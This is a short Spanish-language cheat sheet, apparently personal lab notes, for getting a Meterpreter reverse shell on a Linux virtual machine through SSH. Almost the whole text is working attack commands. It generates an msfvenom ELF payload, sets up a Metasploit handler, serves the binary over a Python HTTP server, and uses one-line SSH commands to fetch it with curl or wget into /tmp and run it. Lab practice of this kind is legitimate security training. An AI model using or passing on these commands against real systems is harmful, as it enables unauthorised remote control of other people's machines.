~/docs /Meterpreter CHEATSHEET/Reverse SHELL con SSH
Meterpreter CHEATSHEET
Reverse SHELL con SSH
Imported from Notion: Reverse SHELL con SSH
updated:: 2026.07.10
Método — Generar con msfvenom, hospedar y ejecutar vía ssh (manual, fiable)
- Comprueba arquitectura del target (desde tu Kali):
ssh vagrant@192.168.1.144 'uname -m; lsb_release -a 2>/dev/null || true'
# si responde x86_64 -> usa payload x64; si i686/i386 -> usa x86
- Genera el ELF meterpreter en tu atacante (ajusta LHOST y la arquitectura):
# para x64
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.211 LPORT=4444 -f elf -o meter.elf
# para x86 (si el target es 32-bit)
# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.211 LPORT=4444 -f elf -o meter.elf
- Levanta un handler en Metasploit (msfconsole):
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp # o linux/x86/... según generaste
set LHOST 192.168.1.211
set LPORT 4444
set ExitOnSession false
exploit -j
- Sirve el binario desde Kali (desde la carpeta donde está
meter.elf):
python3 -m http.server 8000
- Descarga y ejecuta en la VM vía SSH (una línea):
ssh vagrant@192.168.1.144 'curl -fsSL http://192.168.1.211:8000/meter.elf -o /tmp/meter.elf && chmod +x /tmp/meter.elf && /tmp/meter.elf &'
(o con wget si curl no está instalado:
ssh vagrant@192.168.1.144 'wget -qO /tmp/meter.elf http://192.168.1.211:8000/meter.elf && chmod +x /tmp/meter.elf && /tmp/meter.elf &'
- EOF -